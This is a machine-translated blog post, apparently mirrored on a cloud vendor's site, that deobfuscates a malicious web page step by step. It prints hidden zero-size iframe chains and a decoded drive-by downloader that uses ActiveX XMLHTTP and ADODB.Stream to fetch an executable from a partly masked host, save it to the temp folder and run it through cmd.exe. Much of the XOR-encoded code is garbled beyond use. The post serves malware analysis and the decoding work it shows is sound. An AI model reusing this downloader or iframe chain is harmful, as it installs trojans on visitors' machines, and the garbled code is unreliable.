Home > Developer > JavaScript

Jser must see crack JavaScript all kinds of encrypted reverse thinking method [Original]_javascript Tips

Source: Internet
Author: User
Tags decrypt
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

Original articles, reproduced please specify the source cloud Habitat Community
Found to crack a variety of JavaScript encryption reverse thinking method, we have a good way to all the threads AH
Recently found a code, encrypted 5 layers around, I will crack to the last step, and do not use JavaScript decryption program

List of software to use
1, Thunder (download page) Direct browsing will be executed, do not see the source code
2, or with Firefox this software can directly browse the Web site, because of the specificity of Firefox, also recommended using this browser
First, the target URL http://www.e9ad.cn/pcdd/80-806.htm
We use the Thunder to download this page or browse with the Firefox browser to get the following code

Copy Code code as follows:



<script Language=javascript>var Dfqc=function (a) {return String.fromCharCode


(a^22)}; document.write (DFQC) +DFQC (126) +DFQC (a) +DFQC (123) +DFQC (122) +DFQC (a) +DFQC (27)


+DFQC (+DFQC) +DFQC (a) +DFQC (126) +DFQC (m) +DFQC (119) +DFQC (114) +DFQC (a) +DFQC (a) +DFQC


(a) +DFQC (+DFQC) +DFQC (117) +DFQC (m) +DFQC (127) +DFQC (102) +DFQC (a) +DFQC (a) +DFQC (27)


+DFQC (a) +DFQC +DFQC (112) +DFQC (+DFQC) +DFQC (117) +DFQC (+DFQC) 127 (+DFQC) 121


(+DFQC) +DFQC (117) +DFQC (122) +DFQC (m) +DFQC (119) +DFQC (MB) +DFQC () +DFQC


(109) +DFQC (+DFQC) +DFQC (a) +DFQC (i) +DFQC (121) +DFQC (a) +DFQC (m) +DFQC (117) +DFQC (115)


+DFQC (+DFQC) (114) +DFQC (121) +DFQC (117) +DFQC () +DFQC (123) +DFQC (98) +DFQC


+DFQC (+DFQC) (116) +DFQC (121) +DFQC (114) +DFQC (a) +DFQC (a) +DFQC (112) +DFQC (127) +DFQC (100)


+DFQC (+DFQC) +DFQC () +DFQC (126) +DFQC (127) +DFQC (122) +DFQC (114) +DFQC (a) +DFQC (114)


+DFQC (119) +DFQC +DFQC (119) +DFQC (a) +DFQC (a) +DFQC +DFQC (+DFQC) 114 (+DFQC)


(117) +DFQC +DFQC (123) +DFQC () +DFQC (+DFQC) +DFQC (+) +DFQC (121) +DFQC


(+DFQC) +DFQC (+DFQC) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (114) +DFQC (121)


+DFQC (117) +DFQC () +DFQC (123) +DFQC () +DFQC () +DFQC () +DFQC (+DFQC) 117 (122)


+DFQC (121) +DFQC (+DFQC) +DFQC (a) +DFQC (a) (+DFQC) (a) +DFQC (a) [a] +DFQC (a) +DFQC


(114) +DFQC (121) +DFQC (117) +DFQC (a) +DFQC (123) +DFQC (98) +DFQC () +DFQC (+) +DFQC


+DFQC (127) +DFQC +DFQC (122) +DFQC () +DFQC () +DFQC (+DFQC) 113 (+DFQC) 113


(+DFQC) +dfqc +DFQC (a) +DFQC (114) +DFQC (121) +DFQC (117) +DFQC (a) +DFQC (123) +DFQC (115)


+DFQC (+DFQC) +DFQC (a) +DFQC (116) +DFQC (121) +DFQC (114) +DFQC (a) +DFQC (127)


+DFQC () +DFQC () +DFQC () +DFQC (a) +DFQC () +DFQC (+DFQC) +DFQC (a) +DFQC


(i) +DFQC (121) +DFQC () +DFQC +DFQC (117) +DFQC (+) +DFQC (a) +DFQC (a) +DFQC (54)


+DFQC (M) +dfqc (+DFQC) +DFQC (a) +DFQC (117) +DFQC (a) +DFQC (127) +DFQC (102) +DFQC (98)


+DFQC (a) +DFQC +DFQC (a) +DFQC (a) +DFQC (+DFQC) +DFQC (127) +DFQC () +DFQC





+DFQC (+DFQC) +DFQC (a) +DFQC +DFQC (a) +DFQC (+DFQC) +DFQC (A/m) 126


(119) +DFQC (114) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (116) +DFQC (121) +DFQC (114)


+DFQC (+DFQC) +DFQC (121) +DFQC (a) +DFQC (122) +DFQC (121) +DFQC (119) +DFQC (114) +DFQC (43)


+DFQC (117) +DFQC (122) +DFQC (m) +DFQC (119) +DFQC (m) +dfqc (+) +DFQC (m) +dfqc (m) +DFQC


(121) +DFQC (102) +DFQC (123) +DFQC (119) +DFQC (MB) +DFQC (113) +DFQC (127) +DFQC (a) +DFQC (a) +DFQC


(+DFQC) +DFQC (+DFQC) +DFQC (122) +DFQC () +DFQC (112) +DFQC () +DFQC (123) +DFQC (119)


+DFQC (+DFQC) (113) +DFQC (127) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC


(m) +DFQC (127) +DFQC (113) +DFQC (126) +DFQC (a) +DFQC (123) +DFQC (119) +DFQC (m) +DFQC (113) +DFQC


(127) +dfqc +DFQC (+DFQC) +DFQC (a) +DFQC (+DFQC) +DFQC (116) +DFQC (98) 121 (PDF)


+DFQC (+) +DFQC (121) +DFQC (123) +DFQC (123) +DFQC (119) +DFQC (m) +DFQC (113) +DFQC (127) +DFQC (120)


+DFQC (+DFQC) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (55)


+DFQC (+DFQC) +DFQC (a) +DFQC (a) +DFQC (+DFQC) 127 (+DFQC) 112 () +DFQC


(123) +DFQC (+DFQC) +DFQC () +DFQC (119) +DFQC (123) +DFQC (95) +DFQC () +DFQC


+DFQC (M) +dfqc (+DFQC) +DFQC (a) +DFQC (m) +DFQC (117) +DFQC (a) +DFQC () +DFQC


(+DFQC) +DFQC (+DFQC) +DFQC (126) +DFQC () +DFQC (123) +DFQC () +DFQC (123)


+DFQC (119) +DFQC (MB) +DFQC (113) +DFQC (127) +DFQC (+DFQC) +DFQC (127) +DFQC (98)


+DFQC (126) +DFQC (+DFQC) +DFQC (m) +dfqc (+DFQC) +DFQC (123) +DFQC (a) 119


(113) +DFQC (127) +DFQC +DFQC (126) +DFQC () +DFQC (127) +DFQC (113) +DFQC (126) +DFQC (+) +DFQC


+DFQC (+DFQC) +DFQC +DFQC (126) +DFQC () +DFQC (127) +DFQC (113) +DFQC (126) (+DFQC)


+DFQC (+DFQC) +DFQC (a) +DFQC (a) +DFQC (+DFQC) +DFQC () +DFQC (a) +DFQC 127


(114) +dfqc +DFQC (126) +DFQC ((+DFQC) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (101)


+DFQC (117) +DFQC +DFQC (121) +DFQC (122) +DFQC (122) +DFQC (127) +DFQC () +DFQC (113) +DFQC (43)


+DFQC (+DFQC) +DFQC (121) +DFQC (a) +DFQC (+DFQC) 116 (a) +DFQC (121) +DFQC (114)


+DFQC (+DFQC) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (+DFQC) +DFQC (PDF) 112


(119) +DFQC (123) +DFQC (+) +DFQC (116) +DFQC (121) +DFQC (m) +DFQC (114) +DFQC (m) +dfqc (m) +DFQC


+DFQC (+DFQC) +DFQC (a) +DFQC (+DFQC) +DFQC (127) +DFQC (100), +DFQC (())


+DFQC (119) +DFQC (123) +DFQC (+) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC


(+DFQC) +dfqc +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (116) +DFQC (121) +DFQC (114) +DFQC (111)


+DFQC (a) +DFQC +DFQC (a) +DFQC (a) +DFQC (+DFQC) +DFQC (126) +DFQC () +DFQC


(122) +DFQC +DFQC (a) +DFQC (a) +DFQC (+DFQC) +DFQC (M) (a) +DFQC (a)


+DFQC (a) +DFQC +DFQC (a) +DFQC (a) +DFQC (a) +DFQC ((a) (a) (a) (a) (a) (a) (a) (a) (a) (a)) +DFQC (a) +DFQC


+DFQC (+DFQC) +DFQC () +DFQC (127) +DFQC (+DFQC) 114 (+DFQC) 121 () +DFQC () +DFQC (56)


+DFQC (114) +DFQC () +DFQC (112) +DFQC (119) +DFQC (a) +DFQC (122) +DFQC () +DFQC () +DFQC


(119) +DFQC (+DFQC) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (45)


+DFQC (a) +DFQC +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (A/+DFQC) (27)


+DFQC (a) +DFQC +DFQC (a) +DFQC (+DFQC) +DFQC (a) +DFQC (a) +DFQC () +DFQC (40)


+DFQC (a) +DFQC (+DFQC) +DFQC (127) +DFQC (112) +DFQC (m) +DFQC (119) +DFQC (123) +DFQC (115)


+DFQC (+DFQC) +DFQC (a) +DFQC (117) +DFQC (a) +DFQC (126) +DFQC () +DFQC (+DFQC) 102


(a) +DFQC (+DFQC) +DFQC (102) +DFQC (121) +DFQC (102) +DFQC (a) +DFQC () +DFQC (108) +DFQC (110)


+DFQC (+DFQC) +DFQC +DFQC (117) +DFQC (121) +DFQC (123) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC





+DFQC (123) +DFQC (+DFQC) +DFQC (127) +DFQC (114) +DFQC (a) +DFQC (126) +DFQC (a) +DFQC (pdf) +DFQC


+DFQC (126) +DFQC () +DFQC (127) +DFQC (113) +DFQC (126) +DFQC () +DFQC (a) +DFQC (40)


+DFQC (a) +DFQC (a) +DFQC (127) +DFQC (112) +DFQC (a) +DFQC (119) +DFQC (123) +DFQC (m) +DFQC (40)


+DFQC (a) +DFQC (a) +DFQC (a) +DFQC + ');</script>





For this decryption, analysis of the


Everybody look down document.write (DFQC) +DFQC (126) ...


The DFQC of this DFQC (42) is to decrypt the Var dfqc=function (a) {return String.fromCharCode (a^22)}


The following my decryption code also think well, this method can basically crack a lot of similar code, we can look at this code


<html><body> <div id=thes></div> <script language=javascript>var dfqc=function (a) {RET Urn String.fromCharCode (a^22)};d Ocument.getelementbyid (' thes ') innertext= (DFQC) +DFQC (126) +DFQC ($) +DFQC (123) +DFQC (122) +DFQC () +DFQC (a) +DFQC (a) +DFQC (+DFQC) +DFQC (126) +DFQC (m) +DFQC (119) +DFQC () 114 (a) +DFQC ( +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (117) +DFQC (a) +DFQC (127) +DFQC (102) +DFQC () +DFQC (a) +DFQC (a) +DFQC (28) + DFQC (+DFQC) +DFQC (112) +DFQC (+DFQC) 117 (() +DFQC () +DFQC (127) +DFQC (121) +DFQC (The) +DFQC (a) +DFQC (117) +DFQC (122) +DFQC +DFQC (119) +DFQC (+DFQC) +DFQC (121) +DFQC () 109 (a) +DFQC () +DFQC (a) +DFQC (a) +DFQC (a) + DFQC (+DFQC) +DFQC (117) +DFQC (115) +DFQC (+DFQC) 114 (+DFQC) 121 (+DFQC) 117 (+DFQC) +DFQC (+) 123 DFQC (+DFQC) +DFQC (a) +DFQC (116) +DFQC (121) +DFQC (114) +DFQC (a) +DFQC (a) +DFQC (112) +DFQC (127) +DFQC (100) + DFQC (+DFQC) +DFQC () +DFQC (126) +DFQC (127) +DFQC (122) +DFQC (114) +DFQC (a) +DFQC (114) +DFQC (119) +DFQC (+) +DFQC (119) +DFQC (a) +DFQC (a) +DFQC (+DFQC) +DFQC (114) +DFQC (a) 121 (+DFQC) 117 (MB) (123) +DFQC (+DFQC) +DFQC (+) +DFQC (a) +DFQC (121) +DFQC (102) +DFQC () +DFQC () +DFQC (+) +DFQC (45) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (114) +DFQC (121) +DFQC (117) +DFQC (a) +DFQC (123) +DFQC (+) +DFQC (a) +DFQC (+) +DFQC (a) +DFQC (117) +DFQC (122) +DFQC (121) +DFQC (i) +DFQC (54) +DFQC (+) +DFQC (a) +DFQC (a) +DFQC (a) + DFQC (114) +DFQC (121) +DFQC (117) +DFQC (+DFQC) 123 (+DFQC) +DFQC (+) +DFQC (a) +DFQC (+) +DFQC (a) +DFQC (+) +DFQC (122) +DFQC () +dfqc +DFQC (+DFQC) 113 (a) +DFQC (113) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (54) + DFQC (114) +DFQC (121) +DFQC (117) +DFQC () +DFQC (123) +DFQC (121) +DFQC () +DFQC (+DFQC) +DFQC (a) 116 DFQC (114) +DFQC (+DFQC) +DFQC (127) +DFQC () +DFQC () +DFQC () +DFQC (a) +DFQC () +dfqc (MB) +DFQC +DFQC (+DFQC) +DFQC (121) +DFQC (+DFQC) +DFQC (a) 117 +dfqc (a) +DFQC (a) (a)C (+DFQC) +DFQC (+DFQC) +DFQC (a) +DFQC (a) +DFQC (117) +DFQC (m) +DFQC (127) +DFQC (102) +DFQC () +DFQC (40) +DFQC (a) +DFQC +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (127) +DFQC () +DFQC (122) +DFQC (m) +DFQC (a) +DFQC (119) +DFQC ( 114) +DFQC +DFQC (+DFQC) +DFQC (127) +DFQC (+) +DFQC (122) +DFQC (m) +DFQC (a) +DFQC (54) +DFQC (a) + DFQC (+DFQC) +DFQC (126) +DFQC (a) +DFQC (119) +DFQC (114) +DFQC (a) +DFQC (a) +DFQC (m) +DFQC (a) (a) +DFQC (* 116) +DFQC (121) +DFQC (114) +DFQC (a) +DFQC (a) +DFQC (121) +DFQC (+DFQC) 122 (+DFQC) 121 (+DFQC) 119 (+DFQC) 114 (+DFQC) ( +DFQC (117) +DFQC (122) +DFQC (102) +DFQC (119) +DFQC (m) +dfqc (+) +DFQC () +DFQC (+DFQC) +DFQC (+) + DFQC (123) +DFQC (119) +DFQC (a) +DFQC (113) +DFQC (127) +DFQC (a) +DFQC (a) +DFQC (m) +dfqc (+DFQC) +DFQC 122) +DFQC (52) +DFQC (112) +DFQC () +DFQC (123) +DFQC (119) +DFQC (m) +DFQC (113) +DFQC (127) +DFQC () +DFQC (a) +DFQC ) +DFQC (+DFQC) +DFQC (a) +DFQC +DFQC (127) +DFQC (113) +DFQC (126) +DFQC () +DFQC (123) +DFQC (119)+DFQC (M) +DFQC (113) +DFQC (127) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (+DFQC) +DFQC (a) +DFQC (116) +DFQC (+DFQC) +DFQC (121) +DFQC (123) +DFQC (123) +DFQC (119) +DFQC (a) +DFQC (113) +DFQC (127) +DFQC () +DFQC () (52 +DFQC (+DFQC) +DFQC () +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (28) + DFQC (+DFQC) (127) +DFQC (112) +DFQC (a) +DFQC (119) +DFQC (123) +DFQC (123) +DFQC (a) +DFQC (a) +DFQC (119) +DFQC (a) + DFQC (+) +DFQC (+DFQC) +dfqc +DFQC (m) +dfqc (m) +dfqc (m) +dfqc () +DFQC (+DFQC) 117 (52) ) +DFQC (+DFQC) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (126) +DFQC () +DFQC (123) +DFQC (a) +DFQC (a) +DFQC (123) +DFQC ( 119) +DFQC (+DFQC) +DFQC (127) +DFQC (113) +DFQC () +DFQC (127) +DFQC (114) +DFQC () +DFQC (126) +DFQC (a) +DFQC (52) +DFQC (M) +dfqc (+DFQC) +DFQC (123) +DFQC (119) +DFQC (a) +DFQC (113) +DFQC (127) +DFQC () +DFQC (126) +DFQC (115) + DFQC (127) +DFQC (113) +DFQC (126) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (126) +DFQC (+) +DFQC (127) +DFQC (113) +DFQC (126) +DFQC () +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC () +DFQC ( +DFQC (127) +DFQC (114) +DFQC (a) +DFQC (126) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (101) + DFQC (117) +DFQC (m) +DFQC (121) +DFQC (122) +DFQC (122) +DFQC (127) +DFQC () +DFQC (113) +DFQC (a) +DFQC (a) +DFQC (120) + DFQC (121) +DFQC (+DFQC) +DFQC (116) +DFQC (121) +DFQC (m) +DFQC (114) +DFQC (m) +dfqc (MB) +DFQC (m) +DFQC (+DFQC) +DFQC +DFQC (112) +DFQC (a) +DFQC (119) +DFQC (123) +DFQC (mm) +DFQC (116) +DFQC (121) +DFQC (m) +DFQC ( 114) +DFQC (+) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (+DFQC) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (112) + DFQC (M) +DFQC (119) +DFQC (123) +DFQC (27) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (() +DFQC (a) (a) (+)-+DFQC ) +DFQC (a) +DFQC (+DFQC) +DFQC (a) +DFQC (116) +DFQC (121) +DFQC (114) +DFQC (a) +DFQC () +DFQC (a)) +DFQC ((a) +DFQC ( +DFQC (a) +DFQC (+DFQC) +DFQC (+DFQC) 123 (+DFQC) 122 (126) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (28)+DFQC (a) +DFQC (+DFQC) +DFQC (a) +DFQC () +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (42) + DFQC (a) +DFQC (+DFQC) +DFQC (a) +DFQC (a) +DFQC (+DFQC) +DFQC () 127 (+DFQC) +DFQC () 114 (97 ) +DFQC (114) +DFQC (+DFQC) +DFQC (112) +DFQC (119) +DFQC (a) +DFQC (122) +DFQC () +DFQC (a) +DFQC (+) +DFQC (119) + DFQC (+DFQC) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (28) + DFQC (+DFQC) +DFQC +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC ($ 85) + DFQC (+DFQC) +DFQC +DFQC (a) +DFQC () +DFQC (a) +DFQC (+DFQC) +DFQC () 127 (+DFQC) 112 (119) +DFQC (a) ) +DFQC (123) +DFQC () +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (117) +DFQC () +DFQC (126) +DFQC () +DFQC (+) +DFQC (102) + DFQC (a) +DFQC (a) +DFQC (a) +DFQC (102) +DFQC (121) +DFQC (102) +DFQC (a) +DFQC () +DFQC (108) +DFQC (a) +DFQC () +DFQC ( +DFQC () +DFQC (117) +DFQC (121) +DFQC (123) +DFQC () +DFQC (a) +DFQC (a) (12) +DFQC () +DFQC7) +DFQC (114) +DFQC (+DFQC) +DFQC (+DFQC) +DFQC (a) 126 () +DFQC () +DFQC (123) +DFQC (a) +DFQC () +DFQC (127) + DFQC (114) +DFQC (+) +DFQC (126) +DFQC (a) +DFQC (a) +DFQC (a) +DFQC (126) +DFQC () +DFQC (127) +DFQC (113) +DFQC (126) +DFQC (i) +DFQC (+DFQC) +DFQC (a) +DFQC (a) +DFQC (+DFQC) 127 (+DFQC) 112 (+DFQC) +DFQC (119) +DFQC (115) + DFQC (+DFQC) +DFQC (a) +DFQC (a) +DFQC (a) + ');</script> </body></html>


[Ctrl + A All SELECT Note: If the need to introduce external JS need to refresh to perform]



The resulting decrypted code is the


Copy Code code as follows:

<script>
function Clear () {
Source=document.body.firstchild.data;
Document.open ();
Document.close ();
Document.title= "GG";
Document.body.innerhtml=source;
}</script>
<title>ad</title>
<body onload=clear () topmargin= "0" leftmargin= "0" rightmargin= "0" bottommargin= "0" >
<!--
<iframe name= "I1" src= "8080.htm" marginwidth= "1" marginheight= "1" height= "no" width= "80"
Scrolling= "No" border= "0" frameborder= "0" ></iframe>
-->
</body>
<SCRIPT>
<!--
Window.defaultstatus= "";
-->
</SCRIPT>
<iframe src=http://pop.*****.com/777/index.htm width=0 height=0></iframe>



Second, check the http://www.e9ad.cn/pcdd/8080.htm and http://pop.*****.com/777/index.htm above


I found that the following iframe was loaded with problems, so,


Download http://pop.*****.com/777/index.htm The code for this page with the download tool can be found as follows


Copy Code code as follows:

<iframe src=http://cc.*****.com/wm/index.htm width=0 height=0></iframe>
<script src= ' http://s92.cnzz.com/stat.php?id=451144&web_id=451144 ' language= ' JavaScript '
charset= ' gb2312 ' ></script>



Look at this, you should think of a lot of web sites to sell traffic similar to the code (is to sell traffic)


Third, continue to analyze the http://cc.*****.com/wm/index.htm


Download this page with the download tool to get


Copy Code code as follows:

<script Language=javascript src=1.js></script>



Okay, continue downloading http://cc.*****.com/wm/1.js This JS file I got this code


Copy Code code as follows:



Eval (function (p,a,c,k,e,d) {e=function (c) {return (c&lt;a? ': E (parseint (C/A))) + ((c=c%a) &gt;35?


String.fromCharCode (c+29): C.tostring ())};if (! "). Replace (/^/,string)) {while (c--) d[e (c)]=k


[c]| | E (c); K=[function (e) {return d[e]}];e=function () {return ' \\w+ '};c=1};while (c--) if (k[c))


P=p.replace (New RegExp (' \\b ' +e (c) + ' \\b ', ' G '), k[c]); return p} (' F 8 (n) {3 g=h.j () *n;k\ ' ~5


\ ' +\ ' 5\ '}l{9=\ ' m://o.p.q/r/s.a\ '; 3 4=t.u ("V"); 4.W ("Y", "z:a-b-c-d-e"); 3 x=4.7


("g.x" + "M" + "L" + "H" + "T" + "T" + "P", ""); 3 s=4.7 ("I.J", ""); S.K=1;X.B ("N", 9,0); X.O (); 6=8 (R); 3


f=4.7 ("U.V", ""); 3 5=f.w (0); 6=f.d (5,6); S.y (); S.z (x.10); s.11 (6,2); S.12 (); 3 q=4.7


("13.14", ""); E=f.d (5+\ ' \\\\15\ ', \ ' 16.a\ '); q.17 (e,\ '/c \ ' +6, "", "B", 0)}18 (i)


{I=1} ', 62, 71, ' | | | var|df|tmp|fname1| createobject|gn|dl|exe|open| | Buildpath|exp1|function|numb


er| math| | random|return|try|http| | Cc|wzxqy|com|wm|mm|document|createelement|object|setattribu


te| | classid|clsid| bd96c556|65a3|11d0|983a|00c04fc29e36| | microsoft| | adodb| stream|type| | | Get|s


end| | | 10000| | | Scripting| Filesystemobject| getspecialfolder| | open| write|responsebody| Savetofil


e| close| shell| application|system32|cmd| Shellexecute|catch '. Split (' | '), 0,{})





We see the above code may find that can not be decrypted, I searched the next, found that there has been decryption code, here can be analyzed, not


The purpose of this article is not to decrypt the program, all I use the following method,


&lt;script&gt; var str= (function (p,a,c,k,e,d) {e=function (c) {return (c&lt;a? ': E (parseint (C/A))) + ((c=c%a) &gt;35? String.fromCharCode (c+29): C.tostring ())};if (! "). Replace (/^/,string)) {while (c--) d[e (c)]=k [c]| | E (c); K=[function (e) {return d[e]}];e=function () {return ' \\w+ '};c=1};while (c--) if (k[c)) P=p.replace (New RegExp (' \\b ') +e (c) + ' \\b ', ' G '), k[c]); return p} (' F 8 (n) {3 g=h.j () *n;k\ ' ~5 \ ' +\ '. 5\ '}l{9=\ ' m://o.p.q/r/s.a\ '; 3 4=t.u ("V"); 4.W ("Y"); Z:a-b-c-d-e "); 3 x=4.7 (" g.x "+" M "+" L "+" H "+" T "+" T "+" P "," "); 3 s=4.7 (" I.J "," "); S.K=1;X.B ("N", 9,0); X.O (); 6=8 (R); 3 f=4.7 ("U.V", ""); 3 5=f.w (0); 6=f.d (5,6); S.y (); S.z (x.10); s.11 (6,2); S.12 (); 3 q=4.7 ("13.14", ""); E=f.d (5+\ ' \\\\15\ ', \ ' 16.a\ '); q.17 (e,\ '/c \ ' +6, "", "B", 0)}18 (i) {i=1} ', 62, 71, ' | | | var|df|tmp|fname1| createobject|gn|dl|exe|open| | Buildpath|exp1|function|numb er| math| | random|return|try|http| | Cc|wzxqy|com|wm|mm|document|createelement|object|setattribu te| | classid|clsid| bd96c556|65a3|11d0|983a|00c04fc29e36| | microsoft| | adodb| stream|type| | | Get|s end| | | 10000| | | Scripting| Filesystemobject| getspecialfolder| | open| write|responsebody| Savetofil e| close| shell| application|system32|cmd| Shellexecute|catch '. Split (' | '), 0,{})) document.write (str); &lt;/script&gt;


[Ctrl + A All SELECT Note: If the need to introduce external JS need to refresh to perform]



The above method, if I think about the next few seconds to think of the method, not previously thought, now everyone can later use more aspects


First use the Eval code with VAR str= ..., then document.write (str); Get the following code


Copy Code code as follows:

function gn (n) {var number=math.random () *n;return ' ~tmp ' + '. tmp '}try
{dl= ' http://cc.*****.com/wm/mm.exe '; var df=document.createelement ("Object");d F.setattribute
("ClassID", "clsid:bd96c556-65a3-11d0-983a-00c04fc29e36"); var x=df. CreateObject
("Microsoft.X" + "M" + "L" + "H" + "T" + "T" + "P", ""); var s=df. CreateObject
("ADODB.stream", ""); S.type=1;x.open ("Get", dl,0); X.send (); fname1=gn (10000); var
F=df. CreateObject ("Scripting.FileSystemObject", ""); var tmp=f.getspecialfolder
(0); Fname1=f.buildpath (TMP,FNAME1); S.open (); S.write (X.responsebody); S.savetofile
(fname1,2); S.close (); var q=df. CreateObject ("Shell.Application", ""); Exp1=f.buildpath
(tmp+ ' \\system32 ', ' cmd.exe '); Q.shellexecute (EXP1, '/C ' +fname1, "", "open", 0)}catch (i) {i=1}



Then we can find this http://cc.*****.com/wm/mm.exe, download down first, remember to download the general look at the size of the virus


The files are very small, first mm.exe renamed Bit mm.exe.txt, open see the following code, alas,


Copy Code code as follows:

<script>window.location= "/wm/mm.exe?" QVYRR=AU6BKUDMTN1 ";</script>
<center></a></body>



See, that's the main thing, Http://cc.*****.com/wm/mm.exe? Qvyrr=au6bkudmtn1


And then use the software to download, this is the virus file,


Finally completed, found that the virus, should be stolen number system Trojan, now online to sell a lot of traffic, we love to play games, please note the





Of course, the above JavaScript reverse thinking method can get most of the encrypted JavaScript, and many others have the decryption process


Preface, everyone if the good method, all posted out ah, so that everyone can progress. Author: Reterry qq:461478385


Original articles, reproduced please specify the source cloud Habitat Community

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
all kinds of tools all kinds of iphones all kinds of samsung phones all kinds of electrical tools all kinds of samsung phones javascript tips kinds of resources
Related Article
JavaScript solution to the eight Queens Problem method summar...
The difference between single and double quotes in JavaScript...
Http status code: 301, 302 redirection, 302 redirection
The html space symbol nbsp; ensp; emsp; introduces and implem...
Ajax and 302 response code Testing
Ajax and 302 response code test_javascript-js tutorial

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More